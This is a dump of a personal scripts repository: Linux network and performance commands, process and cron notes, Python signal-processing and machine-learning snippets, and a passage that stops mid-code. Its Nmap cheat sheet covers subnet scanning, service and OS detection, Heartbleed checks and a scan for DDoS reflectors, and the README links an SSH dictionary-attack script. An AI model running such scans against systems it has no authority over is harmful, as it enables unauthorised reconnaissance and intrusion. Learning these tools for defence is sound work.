| ethtool -i eth0 81 | 82 | # statistics devname 83 | ethtool -S 84 | 85 | # set speed in Mb/s.
86 | ethtool speed <10|100|1000> 87 | 88 | 89 | # configure a wireless network interface 90 | iwconfig 91 | iwconfig essid 92 | 93 | # wget 94 | wget -S --spider http://osswin.sourceforge.net/ 2>&1 | grep Mod 95 | 96 | # check mac addresses 97 | cat /sys/class/net/*/address 98 | 99 | # check the ip address of eth0 100 | ifconfig eth0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}' 101 | 102 | # use curl to check the web page's domain name 103 | curl -s http://en.m.wikipedia.org/wiki/List_of_Internet_top-level_domains | sed -n '//{s/<[^>]*>//g;p}' 104 | 105 | # telnet 106 | telnet localhost 6666 107 | 108 | # check all interfaces 109 | awk '{print $1}' /proc/net/dev|grep :|sed "s/:.*//g" 110 | 111 | # check DNS server version 112 | nslookup -q=txt -class=CHAOS version.bind NS.PHX5.NEARLYFREESPEECH.NET 113 | -------------------------------------------------------------------------------- /monitor/nmap-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | Nmap Cheat Sheet 2 | ========== 3 | 4 | 5 | ### Nmap Target Selection 6 | 7 | ```sh 8 | #Scan a single IP 9 | nmap 192.168.1.1 10 | 11 | #Scan a host 12 | nmap www.testhostname.com 13 | 14 | #Scan a range of IPs 15 | nmap 192.168.1.1-20 16 | 17 | #Scan a subnet 18 | nmap 192.168.1.0/24 19 | 20 | #Scan targets from a text file 21 | nmap -iL list-of-ips.txt 22 | ``` 23 | 24 | ### Nmap Port Selection 25 | 26 | ```sh 27 | #Scan a single Port 28 | nmap -p 22 192.168.1.1 29 | 30 | #Scan a range of ports 31 | nmap -p 1-100 192.168.1.1 32 | 33 | #Scan 100 most common ports (Fast) 34 | nmap -F 192.168.1.1 35 | 36 | #Scan all 65535 ports 37 | nmap -p- 192.168.1.1 38 | ``` 39 | 40 | ### Nmap Port Scan types 41 | 42 | ```sh 43 | #Scan using TCP connect 44 | nmap -sT 192.168.1.1 45 | 46 | #Scan using TCP SYN scan (default) 47 | nmap -sS 192.168.1.1 48 | 49 | #Scan UDP ports 50 | nmap -sU -p 123,161,162 192.168.1.1 51 | 52 | #Scan selected ports - ignore discovery 53 | nmap -Pn -F
192.168.1.1 54 | ``` 55 | 56 | ### Service and OS Detection 57 | 58 | ```sh 59 | #Detect OS and services 60 | nmap -A 192.168.1.1 61 | 62 | #Standard service detection 63 | nmap -sV 192.168.1.1 64 | 65 | #More aggressive service detection 66 | nmap -sV --version-intensity 5 192.168.1.1 67 | 68 | #Lighter banner-grabbing detection 69 | nmap -sV --version-intensity 0 192.168.1.1 70 | ``` 71 | 72 | ### Nmap Output Formats 73 | 74 | ```sh 75 | #Save default output to file 76 | nmap -oN outputfile.txt 192.168.1.1 77 | 78 | #Save results as XML 79 | nmap -oX outputfile.xml 192.168.1.1 80 | 81 | #Save results in a grepable format 82 | nmap -oG outputfile.txt 192.168.1.1 83 | 84 | #Save in all formats 85 | nmap -oA outputfile 192.168.1.1 86 | ``` 87 | 88 | ### Digging deeper with NSE Scripts 89 | 90 | ```sh 91 | #Scan using default safe scripts 92 | nmap -sV -sC 192.168.1.1 93 | 94 | #Get help for a script 95 | nmap --script-help=ssl-heartbleed 96 | 97 | #Scan using a specific NSE script 98 | nmap -sV -p 443 --script=ssl-heartbleed.nse 192.168.1.1 99 | 100 | #Scan with a set of scripts 101 | nmap -sV --script=smb* 192.168.1.1 102 | ``` 103 | 104 | The option `--script-help=$scriptname` will display help for the individual scripts. To get an easy list of the installed scripts, try `locate nse | grep script`. 105 | 106 | You will notice I have used the -sV service detection parameter. Generally, most NSE scripts will be more effective and you will get better coverage by including service detection. 107 | 108 | **A scan to search for DDoS reflection UDP services** 109 | 110 | ```sh 111 | #Scan for UDP DDoS reflectors 112 | nmap -sU -A -Pn -n -pU:19,53,123,161 --script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.1.0/24 113 | ``` 114 | 115 | UDP-based DDoS reflection attacks are a common problem that network defenders come up against. This is a handy Nmap command that will scan a target list for systems with open UDP services that allow these attacks to take place.
Full details of the command and the background can be found on the [Sans Institute Blog](https://isc.sans.edu/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193) where it was first posted. 116 | 117 | ### HTTP Service Information 118 | 119 | ```sh 120 | #Gather page titles from HTTP services 121 | nmap --script=http-title 192.168.1.0/24 122 | 123 | #Get HTTP headers of web services 124 | nmap --script=http-headers 192.168.1.0/24 125 | 126 | #Find web apps from known paths 127 | nmap --script=http-enum 192.168.1.0/24 128 | ``` 129 | There are many HTTP information-gathering scripts; here are a few that are simple but helpful when examining larger networks. They help quickly identify what HTTP service is running on an open port. Note that the http-enum script is particularly noisy. 130 | 131 | ### Detect Heartbleed SSL Vulnerability 132 | 133 | ```sh 134 | #Heartbleed testing 135 | nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24 136 | ``` 137 | Heartbleed detection is one of the available SSL scripts. It will detect the presence of the well-known Heartbleed vulnerability in SSL services. Specify alternative ports to test SSL on mail and other protocols. 138 | 139 | **IP Address Information** 140 | 141 | ```sh 142 | #Find information about an IP address 143 | nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24 144 | ``` 145 | 146 | Gather information related to the IP address and the netblock owner of the IP address. Uses ASN, whois, and GeoIP location lookups.
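The grepable (-oG) format mentioned above lends itself to quick shell post-processing. A small sketch: the scan.gnmap file and its contents below are a fabricated sample (not real scanner output), used to show how to pull out each host's open TCP ports:

```shell
# create a made-up sample of nmap's grepable output
cat > scan.gnmap <<'EOF'
Host: 192.168.1.1 ()  Ports: 22/open/tcp//ssh///, 443/open/tcp//https///
Host: 192.168.1.7 ()  Ports: 80/open/tcp//http///
EOF

# print "<host> <port>" for every open port
awk '/Ports:/ {
  for (i = 1; i <= NF; i++)
    if ($i ~ /\/open\//) { split($i, p, "/"); print $2, p[1] }
}' scan.gnmap
```

The same one-liner works on a real file produced by `nmap -oG scan.gnmap …`, since only the `Ports:` lines are inspected.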
147 | 148 | ### Reference 149 | 150 | * [Nmap Cheat Sheet](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) -------------------------------------------------------------------------------- /monitor/performance_tool.sh: -------------------------------------------------------------------------------- 1 | # tell how long the system has been running 2 | uptime 3 | 4 | # display linux tasks 5 | top 6 | 7 | # an interactive process viewer for unix 8 | htop 9 | 10 | # report processor-related statistics 11 | # -A, display all information 12 | mpstat 13 | 14 | # display CPU statistics for each individual CPU (or core) 15 | mpstat -P ALL 1 16 | 17 | # display information about CPU usage and IO statistics 18 | # -c, display only the CPU usage 19 | # -d, display only the disk IO 20 | # -n, display only the device and NFS statistics 21 | iostat 22 | 23 | # display the memory usage (including swap) 24 | # -a, display active and inactive memory information 25 | # -f, display number of forks since last boot 26 | # vmstat 2, to execute every 2 seconds 27 | vmstat 28 | 29 | # display amount of free and used memory in the system 30 | free 31 | 32 | # print network traffic statistics 33 | nicstat -z 1 34 | 35 | # versatile tool for generating system resource statistics 36 | dstat 1 37 | 38 | # collect, report, or save system activity information 39 | sar 40 | 41 | # display summary statistics for each protocol 42 | netstat -s 43 | 44 | # report statistics for linux tasks 45 | pidstat 1 46 | pidstat -d 1 47 | 48 | # strace, trace system calls and signals 49 | # -ttt, the time printed will include the microseconds and the leading portion will be printed 50 | # as the number of seconds since the epoch. 51 | # -T, show the time spent in system calls. 52 | # -p, attach to the process with the PID and begin tracing.
53 | strace -tttT -p 12670 54 | 55 | 56 | # tcpdump, dump traffic on a network 57 | tcpdump -nr /tmp/out.tcpdump 58 | 59 | # btrace, perform live tracing for block devices 60 | btrace /dev/sdb 61 | 62 | # iotop, watch IO usage by process 63 | iotop -bod5 64 | 65 | # slabtop, display kernel slab cache information in real time 66 | slabtop -sc 67 | 68 | # configure kernel parameters at runtime 69 | sysctl -a 70 | 71 | # perf, linux profiling with performance counters 72 | # perf stat, obtain event counts 73 | perf stat gzip file1 74 | 75 | # perf record, record events for later reporting 76 | perf record -a -g -F 997 sleep 10 -------------------------------------------------------------------------------- /monitor/process.sh: -------------------------------------------------------------------------------- 1 | 2 | top 3 | 4 | ps 5 | # a = show processes for all users 6 | # u = display the process's user/owner 7 | # x = also show processes not attached to a terminal 8 | ps aux 9 | 10 | ps -f -u www-data 11 | 12 | ## -C, search by name 13 | ps -C apache2 14 | 15 | ## --sort by cpu usage and show the top 5; -pcpu is descending, pcpu is ascending 16 | ps aux --sort=-pcpu | head -5 17 | 18 | ## -f --forest, print the process hierarchy as a tree 19 | ps -f --forest -C apache2 20 | 21 | ## show all child processes of a parent process 22 | ps -o pid,uname,comm -C apache2 23 | ps --ppid 2359 24 | 25 | ## show all threads of one process 26 | ps -p 3150 -L 27 | 28 | ## show the execution time of processes 29 | ps -e -o pid,comm,etime 30 | 31 | ## monitor "ps" 32 | watch -n 1 'ps -e -o pid,uname,cmd,pmem,pcpu --sort=-pmem,-pcpu | head -15' 33 | 34 | ## pstree, list the current processes and their tree structure 35 | pstree 36 | 37 | ## While running a job you can Shortcut 38 | ## suspend a job ctrl-z 39 | ## terminate a job ctrl-c 40 | ## Function Command 41 | ## Move a suspended job to the foreground fg 42 | ## Continue a suspended job in the background bg 43 | ## List all jobs jobs 44 | ## Kill a job
(%N where N is the job number) kill %N 45 | ## Start a job directly in the background command & 46 | jobs 47 | 48 | ## check the background processes 49 | jobs -p 50 | 51 | ## kill the process with PID 12 52 | kill 12 53 | 54 | ## SIGINT (2): kill 123, same as Ctrl + C 55 | kill -2 123 56 | 57 | ## SIGKILL (9), forcefully terminate 58 | kill -9 123 59 | 60 | ## kill all processes owned by user peidalinux 61 | pkill -u peidalinux 62 | kill -9 $(pgrep -u peidalinux) 63 | 64 | ## move job 123 to the foreground 65 | fg 123 66 | 67 | ## continue job 123 in the background 68 | bg 123 69 | 70 | ## when you execute a job in the background and log out from the session, your process will get killed. 71 | ## you can avoid this in several ways: 72 | ## executing the job with nohup, or making it a batch job using the at, batch or cron command. 73 | 74 | ## nohup stands for "no hang up"; the standard output will be redirected to the nohup.out file 75 | nohup command > myout.file 2>&1 & 76 | 77 | ## to submit a job with the `at` command, first enter: 78 | ## at runtime 79 | at 12:00 # executes commands at 12:00 80 | 81 | ## lists the user's pending jobs, unless the user is the superuser 82 | atq 83 | 84 | ## delete jobs, identified by their job number 85 | atrm 1 # delete job 1 86 | 87 | ## nice is used to invoke a utility or shell script with a particular priority. 88 | ## a niceness of -20 is the highest and 19 is the lowest priority. 89 | ## the default niceness for processes is inherited from the parent process and is usually 0 90 | nice [-n N] [--help] [--version] [command] 91 | nice -n 5 ls 92 | 93 | ## sleep command 94 | date;sleep 1m;date 95 | 96 | ## renice alters the scheduling priority of a running process. 97 | renice 16 -p 13245 # 13245: old priority 10, new priority 16 98 | 99 | ## pmap, report memory map of a process, pmap PID 100 | pmap 20367 101 | 102 | 103 | ## crontab is a list of commands that you want to run on a regular schedule, 104 | ## and also the name of the command used to manage that list.
105 | 106 | ## crontab job scheduler 107 | ## *  *  *  *  *  command 108 | ## m h dom mon dow command 109 | ## m, 0~59, minute of the hour 110 | ## h, 0~23, the hour of the day 111 | ## dom, 1~31, the day of the month 112 | ## mon, 1~12, the month of the year 113 | ## dow, 0~6, the day of the week (0 = Sunday) 114 | ## command, which is the command to be run. 115 | 116 | ## For example, you can run a backup of all your user accounts 117 | ## at 5 a.m. every Monday with: 118 | ## 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ 119 | 120 | ## to edit the crontab, use this command; it will open in vi or vim 121 | crontab -e 122 | 123 | ## remove your crontab so that no jobs are ever executed by cron 124 | crontab -r 125 | 126 | ## display the current crontab 127 | crontab -l 128 | 129 | ## More examples 130 | ## Run the shell script /home/melissa/backup.sh on January 2 at 6:15 A.M. 131 | 15 6 2 1 * /home/melissa/backup.sh 132 | 133 | ## every night at 21:30, restart lighttpd 134 | 30 21 * * * /usr/local/etc/rc.d/lighttpd restart 135 | 136 | ## on the 1st, 10th and 22nd of each month at 4:45, restart lighttpd 137 | 45 4 1,10,22 * * /usr/local/etc/rc.d/lighttpd restart 138 | 139 | ## every Sat and Sun at 1:10, restart lighttpd 140 | 10 1 * * 6,0 /usr/local/etc/rc.d/lighttpd restart 141 | 142 | ## every day, from 18:00 through 23:00, every 30 minutes, restart lighttpd 143 | 0,30 18-23 * * * /usr/local/etc/rc.d/lighttpd restart 144 | 145 | ## every day, from 23:00 through 7:00, every hour, restart lighttpd 146 | 0 23-7/1 * * * /usr/local/etc/rc.d/lighttpd restart 147 | 148 | 149 | -------------------------------------------------------------------------------- /python/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Just another repo of Python scripts and codes 4 | 5 | 6 | Installing packages for Python 3.6 7 | 8 | ```sh 9 | python3.6 -m pip install <package> 10 | ``` 11 | 12 | 13 | ## Scripts 14 | 15 | - [Port Scan](portscan.py) 16 | - [Brute force SSH logins using
paramiko](ssh-dictionary-attack.py) 17 | - [split dataset](machine-learning/split_dataset.py) 18 | - [Compute Receptive Field](machine-learning/computeReceptiveField.py) 19 | 20 | ## Algorithms 21 | 22 | - [Sort Algorithms](pySorting/README.md) 23 | - [All Algorithms implemented in Python](https://github.com/TheAlgorithms/Python) 24 | - [Fourier Transforms](fourier-transforms/README.md) 25 | - [find length of sequences of identical values in a numpy array (run length encoding)](run-length-encoding/run-length-encoding.md) 26 | - [Smoothed z-score algo (very robust thresholding algorithm)](run-length-encoding/ThresholdingAlgo.py) 27 | - [Noise Reduction](noise-reduction/README.md) 28 | 29 | 30 | 31 | Demo of thresholding algorithm 32 | 33 | ![Alt Text](run-length-encoding/ThresholdingAlgo.gif) 34 | 35 | 36 | 37 | ## Great plots 38 | 39 | ![Alt Text](https://media.giphy.com/media/vFKqnCdLPNOKc/giphy.gif) 40 | -------------------------------------------------------------------------------- /python/fourier-transforms/FFT-Tutorial.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | from scipy.fftpack import fft 4 | from scipy.signal import blackman 5 | 6 | def simple_sine_wave(): 7 | t = np.linspace(0, 2*np.pi, 1000, endpoint=True) 8 | f = 3.0 # frequency in Hz 9 | A = 100.0 # amplitude in Unit 10 | s = A * np.sin(2*np.pi*f*t) # signal 11 | 12 | #plt.plot(t,s) 13 | #plt.xlabel('Time ($s$)') 14 | #plt.ylabel('Amplitude ($Unit$)') 15 | 16 | # do the Discrete Fourier Transform with the FFT 17 | Y = np.fft.fft(s) 18 | # it is perfectly mirrored at the half, 19 | # so let's just take the first half 20 | N = len(Y)//2 + 1 21 | 22 | # it is called the amplitude spectrum of the time 23 | # domain signal and was calculated with the Discrete 24 | # Fourier Transform with the Chuck-Norris-Fast FFT 25 | #plt.plot(np.abs(Y[:N])) 26 | 27 | # real physical values for Amplitude and Frequency 28 | dt =
t[1] - t[0] 29 | fa = 1.0/dt 30 | # x-axis: the frequency axis of the FFT 31 | X = np.linspace(0, fa/2, N, endpoint=True) 32 | 33 | # y-axis: the amplitude of the FFT signal 34 | # in most implementations, the output Y of the FFT 35 | # is normalized with the number of samples 36 | plt.plot(X, 2.0*(np.abs(Y[:N]))/N) 37 | plt.xlabel('Frequency ($Hz$)') 38 | plt.ylabel('Amplitude ($Unit$)') 39 | 40 | plt.show() 41 | 42 | def fft_windowed_signal(): 43 | t = np.linspace(0, 2*np.pi, 1000, endpoint=True) 44 | f = 3.0 # frequency in Hz 45 | A = 100.0 # amplitude in Unit 46 | s = A * np.sin(2*np.pi*f*t) # signal 47 | 48 | # do the Discrete Fourier Transform with the FFT 49 | Y = np.fft.fft(s) 50 | # it is perfectly mirrored at the half, 51 | # so let's just take the first half 52 | N = len(Y)//2 + 1 53 | 54 | # it is called the amplitude spectrum of the time 55 | # domain signal and was calculated with the Discrete 56 | # Fourier Transform with the Chuck-Norris-Fast FFT 57 | #plt.plot(np.abs(Y[:N])) 58 | 59 | # real physical values for Amplitude and Frequency 60 | dt = t[1] - t[0] 61 | fa = 1.0/dt 62 | # x-axis: the frequency axis of the FFT 63 | X = np.linspace(0, fa/2, N, endpoint=True) 64 | 65 | # introduce windowing to eliminate the leakage effect 66 | hann = np.hanning(len(s)) 67 | #hamm = np.hamming(len(s)) 68 | #black = np.blackman(len(s)) 69 | 70 | #plt.plot(t, hann*s) 71 | #plt.xlabel('Time ($s$)') 72 | #plt.ylabel('Amplitude ($Unit$)') 73 | #plt.title('Signal with hanning window function applied') 74 | 75 | Yhann = np.fft.fft(hann*s) 76 | plt.figure(figsize=(7,3)) 77 | plt.subplot(121) 78 | plt.plot(t,s) 79 | plt.title('Time Domain Signal') 80 | plt.ylim(np.min(s)*3, np.max(s)*3) 81 | plt.xlabel('Time ($s$)') 82 | plt.ylabel('Amplitude ($Unit$)') 83 | 84 | plt.subplot(122) 85 | plt.plot(X, 2.0*np.abs(Yhann[:N])/N) 86 | plt.title('Frequency Domain Signal') 87 | plt.xlabel('Frequency ($Hz$)') 88 | plt.ylabel('Amplitude ($Unit$)') 89 | 90 | plt.annotate("FFT", 91 | xy=(0.0,
0.2), xycoords='axes fraction', 92 | xytext=(-0.8, 0.2), textcoords='axes fraction', 93 | size=30, va="center", ha="center", 94 | arrowprops=dict(arrowstyle="simple", 95 | connectionstyle="arc3, rad=0.2")) 96 | plt.tight_layout() 97 | plt.show() 98 | 99 | def sine_fftpack(): 100 | # number of sample points 101 | N = 600 102 | # sample spacing 103 | T = 1.0/800.0 104 | x = np.linspace(0.0, N*T, N) 105 | y = np.sin(50.0*2.0*np.pi*x)+0.5*np.sin(80.0*2.0*np.pi*x) 106 | yf = fft(y) 107 | xf = np.linspace(0.0, 1.0/(2.0*T), N//2) 108 | plt.plot(xf, 2.0/N*np.abs(yf[0:N//2])) 109 | plt.grid() 110 | plt.show() 111 | 112 | def sine_fftpack_windowing(): 113 | # the fft input signal is inherently truncated, and this 114 | # truncation can be modelled as multiplication, which 115 | # is the cause of spectral leakage. Windowing the signal 116 | # with a dedicated window function helps mitigate 117 | # spectral leakage. 118 | N = 600 # number of sample points 119 | T = 1.0/800.0 # sample spacing 120 | x = np.linspace(0.0, N*T, N) 121 | y = np.sin(50.0*2.0*np.pi*x)+0.5*np.sin(80.0*2.0*np.pi*x) 122 | yf = fft(y) 123 | w = blackman(N) 124 | ywf = fft(y*w) 125 | xf = np.linspace(0.0, 1.0/(2.0*T), N//2) 126 | plt.semilogy(xf, 2.0/N*np.abs(yf[0:N//2])) 127 | plt.semilogy(xf, 2.0/N*np.abs(ywf[0:N//2])) 128 | plt.legend(['FFT', 'FFT w. window']) 129 | plt.grid() 130 | plt.show() 131 | 132 | def main(): 133 | #simple_sine_wave() 134 | #fft_windowed_signal() 135 | #sine_fftpack() 136 | sine_fftpack_windowing() 137 | 138 | if __name__ == '__main__': 139 | main() -------------------------------------------------------------------------------- /python/fourier-transforms/README.md: -------------------------------------------------------------------------------- 1 | 2 | Fourier Transform 3 | ========== 4 | 5 | 6 | ## FFT Examples in Python 7 | 8 | This tutorial covers, step by step, how to perform a Fast Fourier Transform with Python.
9 | 10 | ![FFT](../images/FFT.png) 11 | 12 | Including 13 | 14 | * How to scale the x- and y-axis in the amplitude spectrum 15 | * Leakage Effect 16 | * Windowing 17 | 18 | ### [Take a look at the IPython Notebook](./FFT-Tutorial.ipynb) 19 | 20 | Fourier analysis is a method for expressing a function as a sum of periodic components, and for recovering the signal from those components. When both the function and its Fourier transform are replaced with discretized counterparts, it is called the discrete Fourier transform (DFT). 21 | 22 | - [Some examples](./FFT-Tutorial.py) 23 | 24 | ### Real World Data Example 25 | 26 | From 27 | 28 | ![Vertical Netload Germany 2013](../images/VerticalGridLoadGermany2013.png) 29 | 30 | To 31 | 32 | ![Periods in NetLoad](../images/VerticalGridLoadGermany2013-FFT.png) 33 | 34 | ## Reference 35 | 36 | - [FFT-Python](https://github.com/balzer82/FFT-Python) 37 | -------------------------------------------------------------------------------- /python/images/FFT.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/images/FFT.png -------------------------------------------------------------------------------- /python/images/VerticalGridLoadGermany2013-FFT.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/images/VerticalGridLoadGermany2013-FFT.png -------------------------------------------------------------------------------- /python/images/VerticalGridLoadGermany2013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/images/VerticalGridLoadGermany2013.png 
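The axis-scaling recipe from the tutorial (frequencies up to fa/2, amplitudes normalized by 2/N) can be sanity-checked with a short NumPy-only sketch; the sampling rate and signal below are illustrative choices, not values taken from the tutorial:

```python
import numpy as np

fs = 1000.0                       # sampling rate in Hz (illustrative)
t = np.arange(0, 2.0, 1.0 / fs)   # 2 s of samples
f0, A = 3.0, 100.0                # a 3 Hz sine with amplitude 100
s = A * np.sin(2 * np.pi * f0 * t)

# one-sided spectrum: frequencies run from 0 up to fs/2
Y = np.fft.rfft(s)
freqs = np.fft.rfftfreq(len(s), d=1.0 / fs)

# normalize by the number of samples, times 2 for the discarded mirror half
amp = 2.0 * np.abs(Y) / len(s)

peak = freqs[np.argmax(amp)]      # -> 3.0 Hz, with amplitude ~ 100
```

Because the 3 Hz sine fits an integer number of cycles into the 2 s window, there is no leakage here and the peak amplitude recovers the original 100 almost exactly; for non-integer cycle counts the windowing tricks shown in FFT-Tutorial.py become necessary.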
-------------------------------------------------------------------------------- /python/machine-learning/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## CNN 4 | 5 | - [Receptive field arithmetic for Convolutional Neural Networks](https://medium.com/mlreview/a-guide-to-receptive-field-arithmetic-for-convolutional-neural-networks-e0f514068807) -------------------------------------------------------------------------------- /python/machine-learning/computeReceptiveField.py: -------------------------------------------------------------------------------- 1 | # [filter size, stride, padding] 2 | #Assume the two dimensions are the same 3 | #Each kernel requires the following parameters: 4 | # - k_i: kernel size 5 | # - s_i: stride 6 | # - p_i: padding (if padding is uneven, right padding will be higher than left padding; "SAME" option in tensorflow) 7 | # 8 | #Each layer i requires the following parameters to be fully represented: 9 | # - n_i: number of features (data layer has n_1 = imagesize) 10 | # - j_i: distance (projected to image pixel distance) between the centers of two adjacent features 11 | # - r_i: receptive field of a feature in layer i 12 | # - start_i: position of the first feature's receptive field in layer i (idx starts from 0, negative means the center falls into padding) 13 | 14 | import math 15 | convnet = [[11,4,0],[3,2,0],[5,1,2],[3,2,0],[3,1,1],[3,1,1],[3,1,1],[3,2,0],[6,1,0], [1, 1, 0]] 16 | layer_names = ['conv1','pool1','conv2','pool2','conv3','conv4','conv5','pool5','fc6-conv', 'fc7-conv'] 17 | imsize = 227 18 | 19 | def outFromIn(conv, layerIn): 20 | n_in = layerIn[0] 21 | j_in = layerIn[1] 22 | r_in = layerIn[2] 23 | start_in = layerIn[3] 24 | k = conv[0] 25 | s = conv[1] 26 | p = conv[2] 27 | 28 | n_out = math.floor((n_in - k + 2*p)/s) + 1 29 | actualP = (n_out-1)*s - n_in + k 30 | pR = math.ceil(actualP/2) 31 | pL = math.floor(actualP/2) 32 | 33 | j_out = j_in * s 34 | r_out = r_in + (k -
1)*j_in 35 | start_out = start_in + ((k-1)/2 - pL)*j_in 36 | return n_out, j_out, r_out, start_out 37 | 38 | def printLayer(layer, layer_name): 39 | print(layer_name + ":") 40 | print("\t n features: %s \n \t jump: %s \n \t receptive size: %s \t start: %s " % (layer[0], layer[1], layer[2], layer[3])) 41 | 42 | layerInfos = [] 43 | if __name__ == '__main__': 44 | #first layer is the data layer (image) with n_0 = image size; j_0 = 1; r_0 = 1; and start_0 = 0.5 45 | print ("-------Net summary------") 46 | currentLayer = [imsize, 1, 1, 0.5] 47 | printLayer(currentLayer, "input image") 48 | for i in range(len(convnet)): 49 | currentLayer = outFromIn(convnet[i], currentLayer) 50 | layerInfos.append(currentLayer) 51 | printLayer(currentLayer, layer_names[i]) 52 | print ("------------------------") 53 | layer_name = input("Layer name where the feature is in: ") 54 | layer_idx = layer_names.index(layer_name) 55 | idx_x = int(input("index of the feature in x dimension (from 0)")) 56 | idx_y = int(input("index of the feature in y dimension (from 0)")) 57 | 58 | n = layerInfos[layer_idx][0] 59 | j = layerInfos[layer_idx][1] 60 | r = layerInfos[layer_idx][2] 61 | start = layerInfos[layer_idx][3] 62 | assert(idx_x < n) 63 | assert(idx_y < n) 64 | 65 | print ("receptive field: (%s, %s)" % (r, r)) 66 | print ("center: (%s, %s)" % (start+idx_x*j, start+idx_y*j)) 67 | -------------------------------------------------------------------------------- /python/machine-learning/split_dataset.py: -------------------------------------------------------------------------------- 1 | DATA_DIR = "appleoutput40" 2 | SC_DATA_DIR = "split_appleoutput40" 3 | VAL_PERCENTAGE = 0.2 4 | from os.path import normpath, basename 5 | from shutil import copyfile 6 | import random 7 | import os 8 | subdir_imgs = [(subdir, files) for subdir, dirs, files in os.walk(DATA_DIR) if len(files)>50] 9 | 10 | 11 | 12 | for subdir, imgs in subdir_imgs: 13 | random.shuffle(imgs) 14 | class_dir =
os.path.basename(os.path.normpath(subdir)) 15 | train_dir = os.path.join(SC_DATA_DIR, "train", class_dir) 16 | val_dir = os.path.join(SC_DATA_DIR, "val", class_dir) 17 | 18 | if not os.path.exists(train_dir): 19 | os.makedirs(train_dir) 20 | if not os.path.exists(val_dir): 21 | os.makedirs(val_dir) 22 | n = len(imgs) 23 | split_point = int((1-VAL_PERCENTAGE)*n) 24 | train_imgs = imgs[:split_point] 25 | val_imgs = imgs[split_point:] 26 | 27 | for img in train_imgs: 28 | copyfile(os.path.join(subdir, img), os.path.join(train_dir, img)) 29 | for img in val_imgs: 30 | copyfile(os.path.join(subdir, img), os.path.join(val_dir, img)) 31 | #for file in files: 32 | # print os.path.join(subdir, file) -------------------------------------------------------------------------------- /python/noise-reduction/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Noise reduction 3 | 4 | 5 | ## total variation denoising 6 | 7 | In signal processing, total variation denoising, also known as total variation regularization, is a process, most often used in digital image processing, that has applications in noise removal. 8 | 9 | It is based on the principle that signals with **excessive and possibly spurious detail have high total variation**, that is, the **integral of the absolute gradient** of the signal is high. 10 | 11 | According to this principle, reducing the total variation of the signal subject to it being a close match to the original signal, **removes unwanted detail whilst preserving important details** such as edges. 12 | 13 | The concept was pioneered by Rudin, Osher, and Fatemi in 1992 and so is today known as the **ROF model**. 14 | 15 | More details: [wikipedia](https://en.wikipedia.org/wiki/Total_variation_denoising) 16 | 17 | I used [proxTV toolbox](https://github.com/albarji/proxTV) in Python to solve this optimization problem. 
Code from: [here](https://dsp.stackexchange.com/questions/43374/removing-low-frequencies-from-a-signal) 18 | 19 | ```python 20 | import scipy.io as sio 21 | import numpy as np 22 | import matplotlib.pyplot as plt 23 | import prox_tv as ptv 24 | 25 | mat_struct = sio.loadmat('Signal1.mat') 26 | noisy_signal = mat_struct['x'].T[0] 27 | 28 | filtered_signal = ptv.tv1_1d(noisy_signal, 50) 29 | 30 | time_vec = np.linspace(0, len(noisy_signal)/1500., len(noisy_signal)) 31 | 32 | plt.close('all') 33 | 34 | fig, ax = plt.subplots(3,1,sharex=True) 35 | 36 | ax[0].plot(time_vec,noisy_signal) 37 | ax[0].set_title('noisy signal') 38 | 39 | ax[1].plot(time_vec,filtered_signal) 40 | ax[1].set_title('filtered signal') 41 | 42 | ax[2].plot(time_vec,noisy_signal - filtered_signal) 43 | ax[2].set_title('noise') 44 | ax[2].set_xlabel('time (s)') 45 | 46 | plt.tight_layout() 47 | plt.show(block=False) 48 | ``` 49 | 50 | ## USING PYWAVELETS TO REMOVE HIGH FREQUENCY NOISE 51 | 52 | > Reference: [here](http://connor-johnson.com/2016/01/24/using-pywavelets-to-remove-high-frequency-noise/) 53 | 54 | ``` 55 | $ sudo pip install PyWavelets 56 | ``` 57 | 58 | The wavelet argument determines the type of wavelet; more wavelet types are listed in the PyWavelets documentation. I've specified the "db4" wavelet as the default, but the PyWavelets module supports over seventy different types of wavelets.
Below is a list of possible wavelet parameters, 59 | 60 | ``` 61 | The Haar wavelet, "haar", produces a square signal 62 | The "Discrete" Meyer wavelet, "dmey" 63 | The Daubechies family of wavelets, "db1" through "db20" 64 | The Symlets family, "sym2" through "sym20" 65 | The Coiflet family, "coif1" through "coif5" 66 | The Biorthogonal and Reverse Biorthogonal families 67 | "bior1.1", "rbio1.1" 68 | "bior1.3", "rbio1.3" 69 | "bior1.5", "rbio1.5" 70 | "bior2.2", "rbio2.2" 71 | "bior2.4", "rbio2.4" 72 | "bior2.6", "rbio2.6" 73 | "bior2.8", "rbio2.8" 74 | "bior3.1", "rbio3.1" 75 | "bior3.3", "rbio3.3" 76 | "bior3.5", "rbio3.5" 77 | "bior3.7", "rbio3.7" 78 | "bior3.9", "rbio3.9" 79 | "bior4.4", "rbio4.4" 80 | "bior5.5", "rbio5.5" 81 | "bior6.8", "rbio6.8" 82 | ``` 83 | 84 | The level argument determines the level of smoothing, but it depends on the length of the signal that you are smoothing, so start with 1, and then move up to 2, etc, until you get an error. (Scientific, I know.) 85 | 86 | ```python 87 | # %pylab inline  <-- add this magic if you're in an IPython notebook 88 | import pywt 89 | import numpy as np 90 | import matplotlib.pyplot as plt 91 | import seaborn 92 | from statsmodels.robust import mad 93 | 94 | def waveletSmooth(x, wavelet="db4", level=1, title=None): 95 | # calculate the wavelet coefficients 96 | coeff = pywt.wavedec(x, wavelet, mode="per") 97 | # calculate a threshold 98 | sigma = mad(coeff[-level]) 99 | # changing this threshold also changes the behavior, 100 | # but I have not played with this very much 101 | uthresh = sigma * np.sqrt(2*np.log(len(x))) 102 | coeff[1:] = 